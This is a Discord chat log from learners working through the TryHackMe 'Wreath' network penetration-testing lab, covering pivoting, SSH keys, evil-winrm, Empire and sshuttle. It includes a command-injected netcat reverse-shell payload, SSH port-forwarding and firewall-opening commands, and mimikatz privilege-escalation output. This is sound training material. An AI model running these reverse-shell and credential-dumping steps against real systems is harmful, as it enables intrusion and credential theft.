#wreath-network

1 messages ยท Page 13 of 1

surreal sail
#

Network went go sleeping ๐Ÿ˜„

polar holly
#

@static elk

hollow bane
#

@polar holly

polar holly
#

wut

hollow bane
#

help

polar holly
#

idk

hollow bane
#

oki

polar holly
#

maybe id_Rsa not fuond

#

thats the warning

hollow bane
#

wait, ig, I need to go to the .ssh dir

#

smh, I need to get the id_rsa file from the webserver

#

why is it not working cri

#

can someone help me out?

#

I am trying to get it to my local machine.

#

let me think....

grave gate
#

If id_rsa file is in .ssh folder then

hollow bane
#

I'm hosting the simple http server from the .ssh folder

grave gate
#

Didn't get your problem

hollow bane
hollow bane
#

I copied the contents from the id_rsa to my own box, now this still doesn't work smh

lusty saffron
hollow bane
#

That is just to get the rsa file

#

Iโ€™ve stopped it

#

So no worries.

lusty saffron
lusty saffron
#

You may append your public key at the end of it

hollow bane
winter lintelBOT
#

Gave +1 Rep to @lusty saffron

hollow bane
#

Iโ€™ll work on it when I get back home.

hollow bane
#

@lusty saffron kekw

#

aaaand still the same.

hollow bane
#

@merry robin Somebody fucked with the wreath network, they made the authorized_keys file immutable and they removed chattr from the machine. @elder kite was trying to help me in VC and he came to a conclusion about the same. This may or may not be an accident(Note: this was not me, I was just trying to get through the network.)

elder kite
#

It's possible they just mangled the pub key, and the priv key

hollow bane
#

Don't know what happened exactly but the network is broken for now.

merry robin
#

People kept using them to screw with the initial access ๐Ÿคทโ€โ™‚๏ธ

#

That's why it tells you to download the private key and use that

hollow bane
hollow bane
west wagon
#

Task 20 Git Server Exploitation => can't ping my attacker machine

lusty saffron
surreal sail
#

Just a bunch of idiots, if you want to have fun, just make a binary king.txt file, just to kick out the too much curious people who will cat that ๐Ÿ˜„

merry robin
surreal sail
#

What I mean, if you want to do fancy joke, keep it small without breaking. And a joke like this, somethings suspect, you will first check the file type instead of running whatever random command

#

But deleted or changing system config, to block people to go back in, that's a NOGO

merry robin
surreal sail
#

Only wanted to point out that that jokes like this, locking out people of this learning path is a not done. That's all

rose coral
#

has the evil-winrm download issue been fixed?

#

wasnt able to download the .website git dir

#

Im gonna go ahead and guess no, then..

#

I got stuck on that same issue like two weeks ago

#

zzz

surreal sail
rose coral
#

maybe rollback to older evil-winrm version

#

oh

#

I ll give it a shot then

surreal sail
#

What is the problem exactly? I'm busy with the network and can scroll up in my notes

rose coral
#

Exactly to a T what you said

#

was my issue also

#

download completes = nothing gets actually downloaded

#

I ll comeback to finish the network tommorow assuming that part was fixed

surreal sail
#

We have to provide the full path, not like in the task or in the video

rose coral
#

ah good to know

#

I think I tried that and it still failed though

#

weirdchamp

#

mind giving me the command u used? if u still have it

surreal sail
#

I used this: download C:\GitStack\repositories\Website.git Website.git

rose coral
#

thanks chief

surreal sail
#

and in the Website.git directory, you still have that messy full path ๐Ÿ˜„

surreal sail
#

So slow ... ๐Ÿ˜›

rose coral
winter lintelBOT
#

Gave +1 Rep to @hushed lark

surreal sail
#

@merry robin There's some little thing confusing in task 43. As we use twice the port number 443 for the reverse shell. Once as Thomas user, and later on for the privilege escalation

#

But i'm in ๐Ÿ˜„ whoami
nt authority\system

surreal sail
#

@merry robin Dude!? Did you set this all up? Because this is awesome! Tell me where I should send a six pack of sweet brown beer of Belgium. ๐Ÿ˜„

#

Just finished!!!

#

But need to redo this all, some part where kind hard to get and understand

surreal sail
#

See you laters, gonna sleep a day or two now ๐Ÿ˜„

junior nebula
merry robin
hollow bane
junior nebula
#

@merry robin I'm not getting any agreements to reset lol

hollow bane
#

Watching dark's walkthrough on wreath(Git server Pivoting), it works fine for him, what's the problem when I'm doing it cri

polar holly
#

connected?

#

it shows ur connected right

junior nebula
#

Ok, I'm still not able to SSH in with the id_rsa key after the reset.

#

@hollow bane Are you able to SSH in with the id_rsa key (no pivoting)? I saw that you had the same problem as me earlier.

hollow bane
#

I'm still not able to ssh into it

hollow bane
polar holly
#

u didnt share ur error

#

how would i know lol

hollow bane
#

@polar holly

lusty saffron
# junior nebula

Did you copy-paste the private key?
There must be some extra whitespace in the file, in beginning or at end.
Remove those and the key should work

lusty saffron
#

I just looked at the terminal title, if you did it right. Then ignore above message๐Ÿ™‚

hollow bane
#

it's just on tmux

lusty saffron
#

Did you get past it?

#

What about /etc/ssh/sshd_config?
Add your own auth_key path into it.
And save your public key on the system with the given naming format in the room

#

And restart sshd๐Ÿ˜„

junior nebula
#

@lusty saffron No white spaces in my file

lusty saffron
#

Then there is something wrong with your key. Usually it is because of copy-pasting from one terminal to other with extra lines๐Ÿ™‚

hollow bane
#

can you assist me in VC later if you are free?

junior nebula
#

@lusty saffron Thanks for your help! It must have been something, but I'm not sure what. Originally I copy and pasted into Sublime, but I just tried with Nano and it worked ๐Ÿ™‚

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

junior nebula
#

Left is the id_rsa I did in Sublime and the right is what I did in Nano.

#

All the other machines I've copy and pasted the id_rsa file I did in Sublime, so not sure what the deal was this time. Oh well, I can finally move forward! Thanks again.

lusty saffron
winter lintelBOT
#

Gave +1 Rep to @lusty saffron

hollow bane
#

anywho, I'm going to head into my examination hall now, I'll cya'll later

lusty saffron
#

Good luckblobfingerguns

junior nebula
#

Good luck @hollow bane

hollow bane
#

I'm done with the exam now ๐Ÿ˜„

spring ridge
#

Hey people I am trying to connect to wreath web server but get this error

#

Also 10.10.10.10, gives me this page, like I am connected but no IP address

merry robin
#

Usually happens when you're trying to use the Burp proxy without starting Burp Suite

merry robin
surreal sail
#

Using SSH local port forward, I am able to connect with xfreerdp.
Using this same technique with WinRM, I cannot connect with evil-winrm, despite adding my user to RMU & having logged in before.
Commands:
ssh -L 3336:10.200.198.150:5985 root@10.200.198.200 -i id_rsa -fN
evil-winrm -u breadslice -p xxxx -i 127.0.0.1 -p 3336

#

Port 5985 on 10.200.198.150 still shows as open.

strange bison
#

Oh yep, didn't see that

surreal sail
#

I'm thinking the problem is some odd WinRM behaviour? As it works, as expected, with RDP (on a different port, of course).

strange bison
#

Some protos are weird

surreal sail
#

I'll have a go at that, thanks!

surreal sail
#

Good day all, I would like to ask what does the message "Garbled Time" means in ssh?

#

I've already copied the key to my attack machine and checked there's no extra space

surreal sail
strange bison
#

No idea then

surreal sail
surreal sail
winter lintelBOT
#

Gave +1 Rep to @strange bison

surreal sail
#

Alright, I found the issue.
It is -P (capital) and not -p to specify a port.

surreal sail
#

I am using C2 Empire from Docker (install on Ubuntu 18.04 is tricky).
When setting up a listener; I am assuming we want the Host to be our localhost (as seen by THM on this specific subnet)?
This does not work, and using the IP of the Docker container is not working either.
I am having issues troubleshooting this, as I don't fully understand yet what we are trying to achieve.

#

Any pointers?

#

Solved it with port forwarding.
I need a rubber duck ..

fallow sierra
#

Anyone else have had issues with root password hash ?

#

i've copy pasted it and its says its not correct still

hushed cargo
#

What exactly do you mean by "not correct?"

#

Is it just not getting recognized as a hash by whichever tool your using?

fallow sierra
#

Answer is not correct

hushed cargo
#

Oh

fallow sierra
#

in explotation phase in the first machine there is question about root password

hushed cargo
#

That I can't really help with as I haven't done this network yet lol

fallow sierra
#

lol

leaden tide
#

On my VM had the wreath hack up to the reverse shell. But VM crashed and had to restart. Would I need to redo the hack from scratch or can I just continue to the git section and beyond. Also am slightly stuck with the chisel and sshuttle pivoting sections.

hollow bane
#

I don't see any listeners in the list.

#

nothing in the web interface too

versed edge
#

My laptop is the only device out of 7 device to get the lowest Wi-Fi speed.
I get full speed in my phone as well as in other 6 devices but the speed is only slow in my laptop.

I'm using Windows 10 and had my Drive C format and things got better for some minutes and suddenly, the issue came out again.

What could be the reason?

cyan vine
versed edge
#

My bad! ๐Ÿ˜‚

leaden tide
#

Will I have to redo steps 5-7 or can I start again from step 17? (Git Server)

hollow bane
waxen orbit
#

Are you sure listener is executed?

half comet
#

Maybe something is blocking.....๐Ÿ”ฅ

hollow bane
hollow bane
#

any idea on how to fix this?

leaden tide
#

Starting the Git Server section but not sure if I can run the task from a fresh tab or would I need the reverse shell from step 5. Can anyone advise please?

hollow bane
hollow bane
waxen orbit
#

Gotta troubleshoot why its not starting.

hollow bane
#

nvm

leaden tide
#

So no one knows the answer to my problem?

glacial iris
#

Is it just me or i can't access the wreath network anymore ?

hushed cargo
hushed cargo
leaden tide
#

Thank you

glacial iris
#

I'm having issues exploiting git-server can't figure how to create the relay via .2xx

hushed cargo
#

Lol. I'm almost there. I'm running the Nmap scan now. Will help you guys soon

glacial iris
#

alright LG

leaden tide
#

What happened was the VM crashed, and rebooted it, but the shell was lost, so was wondering if I had to re-run the shell or proceed to do step 17 regardless.

glacial iris
#

you can proceed regardless

leaden tide
#

Will get on it after. Thanks everyone for your help ๐Ÿ˜Ž

hushed cargo
hushed cargo
#

Ah ok. I see where you're stuck. I just got up to there right before I had ti run out to class. If you still need help later, I'll help you out. Dosent seem like it'll be too hard

glacial iris
hushed cargo
#

ok cool. imma prolly finish up this network tonight

#

this one is wayyyyy easier than holo lol

hushed cargo
#

Dude. I fucking love these networks. Between this one and holo I've learned so much

hushed cargo
hollow bane
#

Toaster is helme out, but thanks for the offer.

hushed cargo
#

Ah ok. Well, if you need an explanation on why it works, I can do that too. I kinda did a deep dive on empire once I got to it. Which is why it took me so long lol

hushed cargo
#

Anyone know what im doing wrong here?

strange bison
hushed cargo
#

i did, but then i was sitting there for like 10 minutes. I figured that wasnt right cuz it said it should only take 1 or 2 minutes

#

but ill go do that now. thanks

glacial iris
#

prod-serv is unreachable blobhuh

hushed cargo
#

I was just on the network earlier. Everything 2as working fine for me

barren robin
hushed cargo
#

Read the rest of that task. It will tell you exactly what you need to do

barren robin
#

hostname is added

hushed cargo
#

Are you connected to the wreath vpn?

barren robin
#

yup

#

Network state: Running

#

Can we please get enough reset request to reset the network to make sure

hushed cargo
#

Just double checking, you're using the wreath specific vpn? It's not the same ovpn file you would use for normal boxes

#

Because there's no other reason you should be having issues

#

I was on the network like 2 hours ago

#

And it was fine

barren robin
#

yup.. I double checked the VPN and I am on wreath specific vpn... spinning up vanilla kali box to see if that has any different results

hushed cargo
#

Interesting

#

Can you send a screenshot of your /etc/hosts?

barren robin
#

sure

#

weird cant paste ss here... need to do it from my phone i guess

#

this is what I have in my hosts files: 10.200.101.200 thomaswreath.thm

barren robin
hushed cargo
#

Weird. It should work

hollow bane
#

47000?

#

still haven't gotten a shell

#

Not working even from the GUI

hushed cargo
#

Which machine are you trying to get a shell on?

hushed cargo
#

The webserver or the gitServer?

fallow sierra
#

Is anyone else have issues to answer on question regarding root password hash ?

hushed cargo
#

Which task? I don't remember each question by heart lol

hushed cargo
#

Oh wait

#

You're talking about the webserver

#

Right?

hollow bane
hushed cargo
hollow bane
hushed cargo
#

You set up the jump server correctly?

hollow bane
hushed cargo
#

Remember, it has to be a php server

hollow bane
#

I even grepped it with port 47000 open

#

It works

hushed cargo
#

Did you open the firewall?

hollow bane
#

But, canโ€™t get back the connection

hollow bane
#

How do I do that?

hushed cargo
#

One of the tasks leading up to the one your on shows you how to open the firewall and key a specific port through. I don't remember the exact command and don't have my notes on me right now, but its there somewhere

hollow bane
hushed cargo
#

firewall-cmd --zone=public --add-port PORT/tcp

#

It's in task 20

#

But thats the command

#

Once you open the firewall you should get your connection

hollow bane
#

Yeah that

#

Got it, thanks

hushed cargo
#

Np

#

If you have any other issues let me know

hushed cargo
#

Anyone else having issues connecting to the network? I can't even ping the webserver

#

vpn is connected

#

and network is running

#

It just refuses to let me connect

small bramble
#

anyone else unable to load https://thomaswreath.thm? It just times out. Checked my hosts file, server pings ok, just never loads the page and never gives the unsecure-->proceed? option listed in Task 5 - Q5

hushed cargo
#

idk. id try to help but as seen above, i cant even ping the webserver

small bramble
#

ip is 10.200.193.200 for me

#

maybe ur 3rd octet (185) is wrong?

hushed cargo
#

nah. the 3rd octet is random for evryone

small bramble
#

mkay

#

why does it require 8 votes to reset?

#

this seems excessive

#

@hushed cargo do you know of any similar rooms to practice pivoting?

hushed cargo
#

I'll be able to reset it in about 10 minutes

hushed cargo
#

Best way to practice would be try out all the different things it talks about

small bramble
#

yeah, I might just spin up a vm lab, studying for eCPPTv2

#

thanks

merry robin
#

8 is about 20% of users in each subnet, iirc

#

Possibly 25%

#

Unfortunately, that's also why things break though. Some people are gits who like spoiling it for others

small bramble
#

@merry robin copy thanks, any ideas how to load the thomaswreath.thm page give the circumstances?

winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

If the server pings, then possibly. Disconnect from the VPN and DM me your ovpn file please?

hushed cargo
merry robin
#

Give it time to restart, and/or try to regenerate your VPN pack. That and make sure you're using the right VPN

#

And connecting to the right IP

hushed cargo
#

yea. ok. will regen my vpn pack now

hollow bane
#

Give it about 2 minutes and then ping the machine

hushed cargo
merry robin
#

After a full reset there's nothing that can be wrong at the network side -- it's literally resetting back to the base images, which I know work

hushed cargo
#

ok

hollow bane
merry robin
#

Meaning either a VPN thing, or an AWS thing

hushed cargo
#

yea, regenning the pack worked

hollow bane
merry robin
#

Wonderful :)

#

Right. Bed time

hushed cargo
#

lol. Good night

hollow bane
#

Have a good nightโ€™s rest Muiri.

hushed cargo
#

Was a blast, i learned a ton. Genuinly haven't had this much fun in a while. I'm super excited to attempt to finish holo again now. Sidenote, im just now realizing my username contains my real name, is there a way to change this?

rustic heath
#

Hi guys, does anyone know why i cannot download the wreath vpn? It says: you don'w have access to any networks

lusty saffron
#

Have you met the requirements for this room?
A 7 day streak or being a subscriber๐Ÿ™‚

#

If so, try leaving and re-joining the room

rustic heath
#

oh, I didn't know i could leave rooms

#

thanks

#

copy thanks @lusty saffron

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

strange bison
hushed cargo
#

Yea. Someone told me that. I sent an email, thanks. And yea, old badges are whatever, but obviously I want it changed going forward

#

Thanks for the tip tho

north escarp
#

Did anyone else come across an issue with installing powershell-empire? I keep getting a 404 error

hollow bane
#

anyone know hot to fix this?

split harbor
#

can you do a ls -la in that dir???

hushed cargo
barren robin
#

still cant get to the internal website lol

hushed cargo
#

if you need help feel free to send me a dm

hollow bane
#

Thanks for the help though

hushed cargo
#

No problem

hollow bane
#

the file has been executed

#

still haven't got a reverse shell.

#

I've tried with multiple different ports

#

@merry robin can you help?

#

sorry for the ping

barren wren
#

did you try pinging yourself?

#

and capturing icmp traffic

hollow bane
#

yeah

#

or wait, gimme a sec

#

wait

#

it says request timed out

#

tried to reconnect with the chisel server, still no response

barren wren
#

oh .. nvm me.. you defo have RCE

#

firewall is probably messing with you

#

let me check my notes

#

taking a look at it 1 sec @hollow bane

hollow bane
#

alright, thanks omega blobheart

#

should I just open up a port in the firewall?

barren wren
#

so this is the cross compiled netcat, right?

hollow bane
#

just used the nc64.exe

#

I'll just try and cross-compile nc

barren wren
#

before you do

hollow bane
#

Mm-hmm

barren wren
#

do me a favor and try to just connect netcat to port 80 and see if that works

hollow bane
barren wren
#

because if you were able to download from your webserver you know at least that that port is open

#

(and I honestly think that box doesn't block any ports)

hollow bane
#

Alright, let me check

barren wren
#

you can even try without the -e cmd.exe and see if it even connects

#

my guess is that nc.exe is getting rekt somehow ...

hollow bane
#

both of them don't work

#

wait

#

aaand, still nope

#

tried with 443 and 80 with and without -e cmd.exe

barren wren
#

so either something is wrong with the URL payload or your nc.exe is getting blocked

#

1 sec

hollow bane
#

alright

#

in the screenshot, the IP of my attacking machine was wrong

#

the ping works, but with the fixed url, it still doesn't work

barren wren
#

did you URL encode it?

hollow bane
#

the powershell.exe command?

#

here is the response from my machine

barren wren
hollow bane
#

nope

barren wren
#

try that, and then maybe try running the nc.exe help thing and see if netcat is even executing

hollow bane
#

alright

#

URL encode doesn't work

barren wren
#

ok, test if netcat is even running by trying to print the help (or similar)

hollow bane
#

powershell.exe nc-VainXpliots.exe --help?

barren wren
#

or whatever the windows equivalent is.. heh

#

but even if that prints an error message I'm ok with it ๐Ÿ˜›

hollow bane
#

because, instead of getting it into temp, I even tried getting it into the current working directory

barren wren
#

I mean your command looked correct (mine was: ||powershell.exe c:\\windows\\temp\\nc-OmegaVoid.exe ip-address 62626 -e cmd.exe|| )

hollow bane
#

no output at all

barren wren
#

isn't it the same as what you were testing in the first place

hollow bane
#

Everything is like it should be, but I still can't figure out why it isn't working.

barren wren
#

sounds like your netcat is borked

#

try crosscompiling

hollow bane
#

that's the last resort now, I'll try and do that now

barren wren
#

let me know if it works

hollow bane
#

@barren wren I got the shell happyPanda

#

Thanks you blobheart

barren wren
#

๐Ÿฅณ

#

so the nc64.exe from the github didn't work, right?

barren wren
#

@merry robin letting muiri know ๐Ÿ™‚

hollow bane
#

corss-compilation worked

#

It's all gonna be done in a matter of an hour, thanks for the help

barren wren
#

glad you got through it

#

I know it can get frustrating sometimes

hollow bane
winter lintelBOT
#

Gave +1 Rep to @barren wren

barren wren
#

it's more annoying when it's in the middle of an exam ๐Ÿ˜„

hollow bane
barren wren
#

so many things happened. You gotta power through until things workk

barren wren
#

go methodically testing everythign and when something isn't working figure out why and how

hollow bane
#

yeah, the only mistake I made was not trying to cross-compile it

#

if I would have done that, I would have been done with wreath by now

barren wren
#

well.. task text said it should have worked

hollow bane
barren wren
#

well, muiri should know now if he reads the ping, so he can fix it ๐Ÿ™‚

hollow bane
#

yeah

barren wren
#

crosscompilation is a good skill to have though ๐Ÿ™‚

hollow bane
#

but was needed

barren wren
#

I've used it on many unintended paths ๐Ÿ˜›

hollow bane
#

๐Ÿ˜†

merry robin
#

Wut?

hollow bane
#

check messages

#

nc64.exe didn't work, without cross-compiling

#

Maybe it's a problem that occurred locally or smth

#

Omega helped me out, I just had to cross-compile

hushed cargo
#

If I remember correctly it was probably AV blocking NC. The tasks say that that could be a problem which is why it shows you how to cross compile

merry robin
#

Because there's a reason I told you not to use that one

hollow bane
#

maybe it's something locally

merry robin
#

That's literally the same as the one you compile -- just precompiled for you

hollow bane
#

hmm, welp, I honestly don't know what happened

#

after I compiled it, it sure did work, before that, it didn't budge

hushed cargo
#

Weird

hollow bane
#

exactly

hushed cargo
#

That makes 0 sense

#

It's not different in any way

hollow bane
#

I literally don't know why, it happened

hushed cargo
#

Damn

hollow bane
#

again, maybe it's something locally

hushed cargo
#

Yea. Could be

hollow bane
#

this isn't the output I was supposed to get, was I

#

because I don't have a reverse shell

hushed cargo
#

Yea. The service is supposed to time out cuz it won't actually start the service

#

Make sure your script is still in the right spot. Theres a cleanup script running on that machine every 5 minutes or so incase someone forgets to clean up after themselves

hollow bane
#

it worked this time

#

maybe, I was late in doing the second command, it mentioned that after 5 minutes, windows performs a cleanup script

hushed cargo
#

Yea. Possibly.

hollow bane
#

Mm-hmm

#

anyone know how I can fix this?

hushed cargo
#

It's saying you don't have a file called system

hollow bane
#

I clearly remember downloading it

hushed cargo
#

Ls?

hollow bane
#

did that, but I don't see it

#

I'll try downloading it again

hushed cargo
#

Well then it may have downloaded to a different directory. What did you use to download it?

hollow bane
#

samba

hushed cargo
#

Hm

#

Sure you copied to the right dir?

hollow bane
#

yeah

#

I'll try and do it again

hushed cargo
#

Hm

#

Yea, try again

hollow bane
#

well, this isn't working

#

any other way than this

hushed cargo
#

Lol, make sure your connected to the server you set up

hollow bane
#

I am

#

alright, I need to head out, it's only 1 question, I'll do it later

#

cya

hushed cargo
#

Lol. Try restarting the server when you get back

fallow sierra
#

Anyone can explain what I've done wrong on task6 that my root password hash is wrong ?

hollow bane
#

wtf, how do I fix this now?

#

nvm

#

got it

#

Muiri, amazing network. Had a pretty good experience.

hushed cargo
#

Congrats

sonic barn
#

Hello I am on task 33. All worked perfectly until downloading Website.git using Evil-WinRM. It just doesn't download anything ! Any idea where it could come this isse ? I can upload but not download ! THanks

sonic barn
#

Evil-WinRM PS C:\GitStack\repositories> download Website.git
Info: Downloading Website.git to ./Website.git

Info: Download successful!

But it download nothing I wonder if the problem is ./ downloading path.

robust cloak
#

Try specifying the absolute path. Evil-WinRM is kind of weird about relative paths for some reason

sonic barn
#

thanks but I tried a lot of variations with relative paths and without.... nothing seems to work for downloading

robust cloak
#

It's been a while since I ran through the network, but I remember something like this working

C:\GitStack\Repositories> download C:\GitStack\Repositories\Website.git /home/kali/wreath/Website.git
#

If not, you can always try other methods of downloading to get practice with that. I believe later portions of Wreath go over using impacket's smbserver.py to move files between your machine and the personal pc

hushed cargo
#

And then it'll take like a year to download

sonic barn
#

THanks i was placing "to" between both paths each time !! I feel so dumb now !! So with absolute paths it works

hushed cargo
#

Lol. Np. Took me a bit to figure that out too

surreal sail
#

good night people. I was doing the Wreath network room but suddenly the host unreachable (Yes, I've checked my ovpn and my internet connection, and I do be in the 10days limit). Anyone know why I can't connect to it anymore?
Thanks in advance

hushed cargo
#

Try regenerating your von pack

#

Vpn*

#

The same thing happened to me

surreal sail
#

Hm, yes sure, let me try

#

Eh, still, regenerated and retried ssh'in, connection still unreachable.

hushed cargo
#

Which machine are you trying to connect to?

surreal sail
#

oh...

#

Network state: Stopped

#

Silly me

hushed cargo
upbeat hollow
#

hi guys

#

im in task 21 and the rdp authentication seems to have some error

#

says protocol security negotiation or connection failure

#

evil-winrm is running and all icmp packets can pass through the relay

#

used ssh port forward in my case

surreal sail
#

I'm not sure if it is a problem on the payload encoded it self or the netcat listener, I've been struggling in task 20 for while

#

For explanation why I'm using this netcat binary is that mine's in /usr/bin/nc is looking for external libraries. (not statically build)

hushed cargo
#

A few things, 1 have you made sure that the machine your targeting can actually talk back to you?

#

2, have you opened the firewall?

#

Cuz those 2 things are very important

surreal sail
#

Hey @hushed cargo, Yes I've opened firewall, about the 1 question, may you explain futher?

hushed cargo
#

Read through the questions again. It walks you though how to check if the machine you're trying to attack can actually communicate with your attacking machine. Remember, you were told in the intro that the only external facing machine on the network is the first webserver. Which means everything else is an internal network

surreal sail
#

I do think my attack communicates with the target, I've connected them using sshuttle

#

if that's what you mean

hushed cargo
#

Did you do all the steps listed in the question on task 20? Specifically the one about using tcp dump?

#

If not, go do it. It'll answer your question

surreal sail
# hushed cargo Did you do all the steps listed in the question on task 20? Specifically the one...

Let me list what I've done; Download and modify 43777.py script (shebang line, changing the ip, .php name), Run the script and get the .php uploaded. After I tested with curl and it seemed to work fine, tested with few commands. On the 10.200.196.200 shell I've opened firewall on port 12346 (firewall-cmd --zone=public --add-port 12346/tcp), and through curl I got a nc binary, there I started a listener (on 12346). I do have an initial access point into the rest of the network, like recommended on the pivoting quest (sshuttle -r root@10.200.196.200 --ssh-cmd "ssh -i id_rsa" 10.200.196.0/24 -x 10.200.196.200). The only phase I'm struggling with is the burp suite / curl part. I can't get reverse shell working.

hushed cargo
#

If you need more in depth explanation dm me

surreal sail
#

Wait, I think I forgot a detail

#

Port must be higher than 15000

fallow sierra
#

I had same issue

#

but I made mistake in reverse shell IP address command

#

try to re-check those as well

surreal sail
#

I've put the compromised host ip there tho

#

Somehow now it worked

#

-_-

fallow sierra
#

Super

fallow sierra
#

I'm copying from shadow file but it says that its wrong one

surreal sail
#

I just removed root:

#

and keep the rest as it is

fallow sierra
#

Hmm for me it's completely wrong

#

I know for sure which one is password hash and where to find it

#

but its not correct ๐Ÿ˜ฆ

crimson trail
#

Question, is there any way to avoid the reset of a box? Some folks appear to not get any further and keep spamming the reset buttonโ€ฆ kinda fun while you do have progressโ€ฆ any way to reset the reset requests?

hushed cargo
#

You don't need to. You can continue from where your up to after the reset

crimson trail
#

Yeah only kind a lazy to do the steps after certain footholds I.e open up ports again etc.

#

But almost through so hopefully Iโ€™ll be done within time before it gets a reset.

hushed cargo
#

Lol. I hear that

#

Good luck

strange bison
upbeat hollow
#

Hi guys!

#

I was poking around with mimikatz

#

there is something wrong while elevating to debug privilege

#

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

#

Googled a bit and all articles pointed out I don't have enough privilege to elevate to that level

#

but I am nt-authority and fyi, I couldn't make use of the GUI rdp session so trying to stick with evil-winrm

#

i dont know what's going on anymore

scarlet tundra
#

hey, Doing wreath. i'm at Task 17.
trying to transfer nmap to the remote and it keeps timing out
curl 10.50.159.195:80/nmap-tabris -o /tmp/nmap-tabris && chmod +x /tmp/nmap-tabris
is the command i'm using on the remote and i have a
sudo python3 -m http.server 80
running on my Kali VM (yes, it's in the correct directory)

strange bison
upbeat hollow
#

`PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled`

upbeat hollow
strange bison
#

Maybe token::elevate if I remember correctly?

upbeat hollow
#

i did that too

#

as mentioned in the github issues

#

another issue is Invoke-Binary mimikatz.exe says filename error

#

executing with ./mimikatz.exe executes the binary continuously so that I have to get out of winrm session to kill that process

#

so I have been executing mimikatz as ./mimikatz.exe "privilege::debug" "exit"

upbeat hollow
# strange bison Maybe token::elevate if I remember correctly?

`mimikatz # token::elevate
Token Id : 0
User name :
SID name : AUTORITE NT\Systรจme

228 24215 AUTORITE NT\Systรจme S-1-5-18 (04g,30p) Primary
-> Impersonated !

  • Process Token : 623884 vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p) Primary
  • Thread Token : 624196 AUTORITE NT\Systรจme S-1-5-18 (04g,30p) Impersonation (Delegation)`
#

also as mentioned he's got impersonated with that additional info

#

mine only has

#

mimikatz(commandline) # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM

strange bison
#

Ok, now priv debug?

upbeat hollow
#

this is not mine

strange bison
#

Oh because you don't have interactivity

upbeat hollow
#

that's an issue?

#

commands go through in order and are displayed as if I have the interactive mimikatz shell

#

sorry if im making no sense i've just started in this field

upbeat hollow
#

`Evil-WinRM PS C:\Users\needle.GIT-SERV\Documents> ./mimikatz.exe "token::elevate" "privilege::debug" "whoami /priv" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # whoami /priv
ERROR mimikatz_doLocal ; "whoami" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname

mimikatz(commandline) # exit
Bye!`

#

sorry whoami is supposed to be in winrm shell

#

got a little confused

upbeat hollow
# strange bison That's a lot of missing privs

I got the hash but not through the evil-winrm. git-serv\<user> didnt have enough privileges as you said but nt authority\system from the php exploit did. So stupid of me. But I made admin account and logged in as guided by the room article. Don't know why I didn't receive the privileges.

strange bison
#

But I made admin account and logged in as guided by the room article. Don't know why I didn't receive the privileges. Hey, I know this one. It's an interesting thing with Windows

#

When you're an administrator, you have two tokens with two different levels of privs, a medium (user) and high (administrator)

upbeat hollow
#

oh

#

why didn't my token work

strange bison
#

Basically you need to run mimi with administrator privs

#

So it can then grab system privs

#

Also not sure if Medium and High are the right levels there, but it's user level and administrator level

upbeat hollow
#

so i failed because i didnt run it as an administrator

#

from the gui session of rdp

#

and I cant elevate the powershell from the winrm alone

#

makes sense

strange bison
upbeat hollow
#

oh

#

are these any rooms related to this?

strange bison
#

It's interesting reading and learning, but it can get complicated fast

#

I am not sure if there are, but I'd like to see one in the future

upbeat hollow
#

thank you for your help

#

really appreciate it

north escarp
#

Hello, for task 29 when trying to get a shell back to our Empire server, I executed the stager with curl using the "a" parameter but I got nothing back to the empire server? I used the payload we got from executing the stager earlier in the task

little folio
#

If anyone's on Wreath right now, the server needs a reset as someone changed the root hash again.

hollow bane
#

or you can just leave the room and rejoin it to join a different subnet. Note: you will not lose any progress

strange bison
little folio
#

Got it, thanks for confirming the process. Appreciate the support.

little folio
#

Also fyi it's 187 octet that needs the reset.

surreal sail
#

Forgot to say. I've finished Wreath network, never learned that much in 4 days, encourages me to play the other networks too :D

soft violet
#

So, I'm on the webserver exploitation section of the network, and trying to run the python script from the CVE, and it says failed to connect even though an nmap scan worked

#

Okay... I just ran the command a few more times and it just works...

soft violet
#

Okay, now I'm trying to curl the nmap binary to the compromised server, and it isn't downloading anything

#

Oh. I think I know

#

Nope...

soft violet
#

I also have no idea how to use sshuttle in git server: pivoting

#
usage: sshuttle [-l [ip:]port] [-r [user@]sshserver[:port]] <subnets...>
sshuttle: error: argument -s/--subnets: Unable to open subnet file: sh-cmd```
#

this is why I'm never gonna be good at pentesting

chilly olive
soft violet
#

Oh

#

Thank you

chilly olive
#

NP

soft violet
#

Oh.... Uh, what

sshuttle -r root@10.200.188.200 --ssh-cmd "ssh -i sshkeys.txt" 10.200.188.0/24 -x 10.200.188.200
c : Connected to server.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
